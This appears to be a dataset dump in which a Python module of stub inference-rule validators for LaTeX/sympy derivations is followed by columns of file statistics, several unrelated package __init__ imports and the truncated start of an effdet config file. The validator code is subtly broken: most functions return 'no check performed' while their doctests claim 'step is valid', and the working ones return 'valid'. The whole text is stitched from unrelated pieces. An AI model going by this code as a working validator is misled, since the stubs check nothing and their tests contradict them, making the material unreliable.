def subtract_expr_1_from_expr_2(latex_dict: dict) -> str:
"""
Instead of creating the inf rule for subtraction,
write this inf rule in terms of add_expr_1_to_expr_2
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> subtract_expr_1_from_expr_2(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def factor_out_x(latex_dict: dict) -> str:
"""
Given a*x + b*x = c*x + d*x
factor out x
Get x*(a + b) = (c + d)*x
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('x')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> factor_out_x(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def factor_out_x_from_lhs(latex_dict: dict) -> str:
"""
Given a*x + b*x = c
factor out x
get x*(a + b) = c
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('x')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> factor_out_x_from_lhs(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def factor_out_x_from_rhs(latex_dict: dict) -> str:
"""
Given a = b*x + c*x
factor out x
get a = (b + c)*x
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('x')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> factor_out_x_from_rhs(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def differentiate_with_respect_to(latex_dict: dict) -> str:
"""
Given a = b,
wrt t
get \frac{d}{dt}a = \frac{d}{dt}b
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('t')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> differentiate_with_respect_to(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def apply_function_to_both_sides_of_expression(latex_dict: dict) -> str:
"""
given a = b
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> apply_function_to_both_sides_of_expression(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def substitute_LHS_of_two_expressions_into_expr(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> substitute_LHS_of_two_expressions_into_expr(latex_dict)
'step is valid'
"""
logger.info("[trace]")
logger.debug(str(latex_dict["input"][0]["LHS"]))
logger.debug(str(latex_dict["input"][0]["RHS"]))
logger.debug(str(latex_dict["feed"][0]))
logger.debug(str(latex_dict["output"][0]["LHS"]))
logger.debug(str(latex_dict["output"][0]["RHS"]))
return "no check performed"
def substitute_LHS_of_three_expressions_into_expr(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> substitute_LHS_of_three_expressions_into_expr(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def substitute_LHS_of_four_expressions_into_expr(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> substitute_LHS_of_four_expressions_into_expr(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def substitute_LHS_of_five_expressions_into_expr(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> substitute_LHS_of_five_expressions_into_expr(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def substitute_LHS_of_six_expressions_into_expr(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> substitute_LHS_of_six_expressions_into_expr(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def expr_is_equivalent_to_expr_under_the_condition(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> expr_is_equivalent_to_expr_under_the_condition(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def change_two_variables_in_expr(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> change_two_variables_in_expr(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
logger.debug(str(latex_dict["input"][0]["LHS"]))
logger.debug(str(latex_dict["input"][0]["RHS"]))
logger.debug(str(latex_dict["feed"][0]))
logger.debug(str(latex_dict["output"][0]["LHS"]))
logger.debug(str(latex_dict["output"][0]["RHS"]))
logger.debug("input: " + str(latex_dict["input"]))
logger.debug("feed: " + str(latex_dict["feed"]))
logger.debug("output: " + str(latex_dict["output"]))
d1 = sympy.simplify(
latex_dict["input"][0]["LHS"]
.subs(latex_dict["feed"][0], latex_dict["feed"][1])
.subs(latex_dict["feed"][2], latex_dict["feed"][3])
- latex_dict["output"][0]["LHS"]
)
d2 = sympy.simplify(
latex_dict["input"][0]["RHS"]
.subs(latex_dict["feed"][0], latex_dict["feed"][1])
.subs(latex_dict["feed"][2], latex_dict["feed"][3])
- latex_dict["output"][0]["RHS"]
)
if (d1 == 0) and (d2 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
return "no check performed"
def change_three_variables_in_expr(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> change_three_variables_in_expr(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
logger.debug("input: " + str(latex_dict["input"]))
logger.debug("feed: " + str(latex_dict["feed"]))
logger.debug("output: " + str(latex_dict["output"]))
d1 = sympy.simplify(
latex_dict["input"][0]["LHS"]
.subs(latex_dict["feed"][0], latex_dict["feed"][1])
.subs(latex_dict["feed"][2], latex_dict["feed"][3])
.subs(latex_dict["feed"][4], latex_dict["feed"][5])
- latex_dict["output"][0]["LHS"]
)
d2 = sympy.simplify(
latex_dict["input"][0]["RHS"]
.subs(latex_dict["feed"][0], latex_dict["feed"][1])
.subs(latex_dict["feed"][2], latex_dict["feed"][3])
.subs(latex_dict["feed"][4], latex_dict["feed"][5])
- latex_dict["output"][0]["RHS"]
)
if (d1 == 0) and (d2 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
return "no check performed"
def change_four_variables_in_expr(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> change_four_variables_in_expr(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
logger.debug("input: " + str(latex_dict["input"]))
logger.debug("feed: " + str(latex_dict["feed"]))
logger.debug("output: " + str(latex_dict["output"]))
d1 = sympy.simplify(
latex_dict["input"][0]["LHS"]
.subs(latex_dict["feed"][0], latex_dict["feed"][1])
.subs(latex_dict["feed"][2], latex_dict["feed"][3])
.subs(latex_dict["feed"][4], latex_dict["feed"][5])
.subs(latex_dict["feed"][6], latex_dict["feed"][7])
- latex_dict["output"][0]["LHS"]
)
d2 = sympy.simplify(
latex_dict["input"][0]["RHS"]
.subs(latex_dict["feed"][0], latex_dict["feed"][1])
.subs(latex_dict["feed"][2], latex_dict["feed"][3])
.subs(latex_dict["feed"][4], latex_dict["feed"][5])
.subs(latex_dict["feed"][6], latex_dict["feed"][7])
- latex_dict["output"][0]["RHS"]
)
if (d1 == 0) and (d2 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
return "no check performed"
def change_five_variables_in_expr(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> change_five_variables_in_expr(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
logger.debug("input: " + str(latex_dict["input"]))
logger.debug("feed: " + str(latex_dict["feed"]))
logger.debug("output: " + str(latex_dict["output"]))
d1 = sympy.simplify(
latex_dict["input"][0]["LHS"]
.subs(latex_dict["feed"][0], latex_dict["feed"][1])
.subs(latex_dict["feed"][2], latex_dict["feed"][3])
.subs(latex_dict["feed"][4], latex_dict["feed"][5])
.subs(latex_dict["feed"][6], latex_dict["feed"][7])
.subs(latex_dict["feed"][8], latex_dict["feed"][9])
- latex_dict["output"][0]["LHS"]
)
d2 = sympy.simplify(
latex_dict["input"][0]["RHS"]
.subs(latex_dict["feed"][0], latex_dict["feed"][1])
.subs(latex_dict["feed"][2], latex_dict["feed"][3])
.subs(latex_dict["feed"][4], latex_dict["feed"][5])
.subs(latex_dict["feed"][6], latex_dict["feed"][7])
.subs(latex_dict["feed"][8], latex_dict["feed"][9])
- latex_dict["output"][0]["RHS"]
)
if (d1 == 0) and (d2 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
return "no check performed"
def change_six_variables_in_expr(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> change_six_variables_in_expr(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
logger.debug("input: " + str(latex_dict["input"]))
logger.debug("feed: " + str(latex_dict["feed"]))
logger.debug("output: " + str(latex_dict["output"]))
d1 = sympy.simplify(
latex_dict["input"][0]["LHS"]
.subs(latex_dict["feed"][0], latex_dict["feed"][1])
.subs(latex_dict["feed"][2], latex_dict["feed"][3])
.subs(latex_dict["feed"][4], latex_dict["feed"][5])
.subs(latex_dict["feed"][6], latex_dict["feed"][7])
.subs(latex_dict["feed"][8], latex_dict["feed"][9])
.subs(latex_dict["feed"][10], latex_dict["feed"][11])
- latex_dict["output"][0]["LHS"]
)
d2 = sympy.simplify(
latex_dict["input"][0]["RHS"]
.subs(latex_dict["feed"][0], latex_dict["feed"][1])
.subs(latex_dict["feed"][2], latex_dict["feed"][3])
.subs(latex_dict["feed"][4], latex_dict["feed"][5])
.subs(latex_dict["feed"][6], latex_dict["feed"][7])
.subs(latex_dict["feed"][8], latex_dict["feed"][9])
.subs(latex_dict["feed"][10], latex_dict["feed"][11])
- latex_dict["output"][0]["RHS"]
)
if (d1 == 0) and (d2 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
return "no check performed"
def LHS_of_expr_equals_LHS_of_expr(latex_dict: dict) -> str:
"""
Given a = b
and a = d
get b = d
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')},
{'LHS': parse_latex('a'), 'RHS': parse_latex('d')}]
>>> latex_dict['output'] = [{'LHS': parse_latex('b'), 'RHS': parse_latex('d')}]
>>> LHS_of_expr_equals_LHS_of_expr(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def square_root_both_sides(latex_dict: dict) -> str:
"""
Given a = b
sqrt both side
get sqrt(a) = sqrt(b)
and sqrt(a) = - sqrt(b)
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')}]
>>> latex_dict['output'] = [{'LHS': parse_latex('\sqrt{a}'), 'RHS': parse_latex('\sqrt{b}')},
{'LHS': parse_latex('\sqrt{a}'), 'RHS': parse_latex('-\sqrt{b}')}]
>>> square_root_both_sides(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def divide_expr_by_expr(latex_dict: dict) -> str:
"""
Given a = b
and c = d
get a/c = b/d
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')},
{'LHS': parse_latex('c'), 'RHS': parse_latex('d')}]
>>> latex_dict['output'] = [{'LHS': parse_latex('a/c'), 'RHS': parse_latex('b/d')}]
>>> divide_expr_by_expr(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def separate_two_vector_components(latex_dict: dict) -> str:
"""
Given a_x \hat{x} + a_y \hat{y} = v_x \hat{x} + v_y \hat{y}
get a_x = v_x
and a_y = v_y
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> separate_two_vector_components(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def separate_three_vector_components(latex_dict: dict) -> str:
"""
Given a_x \hat{x} + a_y \hat{y} + a_z \hat{z} = v_x \hat{x} + v_y \hat{y} + v_z \hat{z}
get a_x = v_x
and a_y = v_y
and a_z = v_z
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> separate_three_vector_components(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def separate_vector_into_two_trigonometric_ratios(latex_dict: dict) -> str:
"""
Given \vec{v} =
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> separate_vector_into_two_trigonometric_ratios(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def maximum_of_expr(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> maximum_of_expr(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def evaluate_definite_integral(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> evaluate_definite_integral(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def expr_is_true_under_condition_expr(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> expr_is_true_under_condition_expr(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def declare_variable_replacement(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> declare_variable_replacement(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def integrate(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> integrate(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def replace_constant_with_value(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> replace_constant_with_value(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def expand_LHS(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> expand_LHS(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def expand_RHS(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> expand_RHS(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def multiply_expr_by_expr(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> multiply_expr_by_expr(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def apply_operator_to_bra(latex_dict: dict) -> str:
"""
given
x = \\langle\\psi_{\\alpha}| \\hat{A} |\\psi_{\\beta}\\rangle
return
x = \\langle\\psi_{\\alpha}| a_{\\alpha} |\psi_{\\beta} \\rangle
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> apply_operator_to_bra(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def apply_operator_to_ket(latex_dict: dict) -> str:
"""
given
x = \\langle\\psi_{\\alpha}| \\hat{A} |\\psi_{\\beta}\\rangle
return
x = \\langle\\psi_{\\alpha}| a_{\\beta} |\psi_{\\beta} \\rangle
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> apply_operator_to_ket(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def drop_nondominant_term(latex_dict: dict) -> str:
"""
given
x = \\langle\\psi_{\\alpha}| \\hat{A} |\\psi_{\\beta}\\rangle
return
x = \\langle\\psi_{\\alpha}| a_{\\beta} |\psi_{\\beta} \\rangle
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> drop_nondominant_term(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def apply_gradient_to_scalar_function(latex_dict: dict) -> str:
"""
given
x = \\langle\\psi_{\\alpha}| \\hat{A} |\\psi_{\\beta}\\rangle
return
x = \\langle\\psi_{\\alpha}| a_{\\beta} |\psi_{\\beta} \\rangle
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> apply_gradient_to_scalar_function(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
# EOF
| 36.614918
| 113
| 0.574262
| 10,161
| 78,539
| 4.180002
| 0.036217
| 0.172698
| 0.079815
| 0.060179
| 0.92753
| 0.905658
| 0.882749
| 0.857321
| 0.794834
| 0.742778
| 0
| 0.016689
| 0.22408
| 78,539
| 2,144
| 114
| 36.631996
| 0.680276
| 0.382052
| 0
| 0.640562
| 0
| 0
| 0.205101
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084337
| false
| 0
| 0.008032
| 0
| 0.291165
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
453f204ef00500daea83df67d629e9b1c4706eba
| 138
|
py
|
Python
|
molsysmt/tools/biopython_SeqRecord/__init__.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
molsysmt/tools/biopython_SeqRecord/__init__.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
molsysmt/tools/biopython_SeqRecord/__init__.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
from .is_biopython_SeqRecord import is_biopython_SeqRecord
from .to_file_fasta import to_file_fasta
from .to_file_pir import to_file_pir
| 27.6
| 58
| 0.884058
| 24
| 138
| 4.583333
| 0.375
| 0.218182
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094203
| 138
| 4
| 59
| 34.5
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
18bbb8cbabaf75d00fa6d0360b98da822a485d70
| 23
|
py
|
Python
|
discordscript/__init__.py
|
jcb1317/DiscordScript
|
3642057d0482dee205de2d46908d33816dfe947f
|
[
"MIT"
] | null | null | null |
discordscript/__init__.py
|
jcb1317/DiscordScript
|
3642057d0482dee205de2d46908d33816dfe947f
|
[
"MIT"
] | null | null | null |
discordscript/__init__.py
|
jcb1317/DiscordScript
|
3642057d0482dee205de2d46908d33816dfe947f
|
[
"MIT"
] | null | null | null |
from .api import Client
| 23
| 23
| 0.826087
| 4
| 23
| 4.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130435
| 23
| 1
| 23
| 23
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
18c2102b0b4f9a8e69a96c1673f20c5ed3c84575
| 21
|
py
|
Python
|
Window/__init__.py
|
Wevel/SilkscreenMasker
|
87c4bcfd18679c1f6c18252016fab2091dc37c05
|
[
"MIT"
] | null | null | null |
Window/__init__.py
|
Wevel/SilkscreenMasker
|
87c4bcfd18679c1f6c18252016fab2091dc37c05
|
[
"MIT"
] | 1
|
2021-06-08T21:07:25.000Z
|
2021-06-08T21:07:25.000Z
|
Window/__init__.py
|
Wevel/SilkscreenMasker
|
87c4bcfd18679c1f6c18252016fab2091dc37c05
|
[
"MIT"
] | null | null | null |
from .dialog import *
| 21
| 21
| 0.761905
| 3
| 21
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 21
| 1
| 21
| 21
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
18fc6dc165fbb75b01e842c17ca498e16ab9f183
| 24
|
py
|
Python
|
rascil/workflows/shared/__init__.py
|
SKA-ScienceDataProcessor/rascil
|
bd3b47f779e18e184781e2928ad1539d1fdc1c9b
|
[
"Apache-2.0"
] | 7
|
2019-12-14T13:42:33.000Z
|
2022-01-28T03:31:45.000Z
|
rascil/workflows/shared/__init__.py
|
SKA-ScienceDataProcessor/rascil
|
bd3b47f779e18e184781e2928ad1539d1fdc1c9b
|
[
"Apache-2.0"
] | 6
|
2020-01-08T09:40:08.000Z
|
2020-06-11T14:56:13.000Z
|
rascil/workflows/shared/__init__.py
|
SKA-ScienceDataProcessor/rascil
|
bd3b47f779e18e184781e2928ad1539d1fdc1c9b
|
[
"Apache-2.0"
] | 3
|
2020-01-14T11:14:16.000Z
|
2020-09-15T05:21:06.000Z
|
from .imaging import *
| 8
| 22
| 0.708333
| 3
| 24
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.208333
| 24
| 2
| 23
| 12
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e12ed18923632a713fb478fe97ebc75f1e370124
| 6,802
|
py
|
Python
|
src/detection_efffdet/effdet/config/fpn_config.py
|
yellowdolphin/SIIM-COVID19-Detection
|
31e8653b467ac35a8b1d92330ad5f15a12622676
|
[
"MIT"
] | 1,386
|
2020-03-27T07:05:36.000Z
|
2022-03-31T17:27:50.000Z
|
effdet/config/fpn_config.py
|
dmatos2012/efficientdet-pytorch
|
301487e859fa8160dd3e01b7dbc54d713b392676
|
[
"Apache-2.0"
] | 176
|
2020-03-27T07:07:36.000Z
|
2022-03-15T19:49:53.000Z
|
effdet/config/fpn_config.py
|
dmatos2012/efficientdet-pytorch
|
301487e859fa8160dd3e01b7dbc54d713b392676
|
[
"Apache-2.0"
] | 276
|
2020-03-28T10:16:24.000Z
|
2022-03-30T19:27:12.000Z
|
import itertools
from omegaconf import OmegaConf
def bifpn_config(min_level, max_level, weight_method=None):
"""BiFPN config.
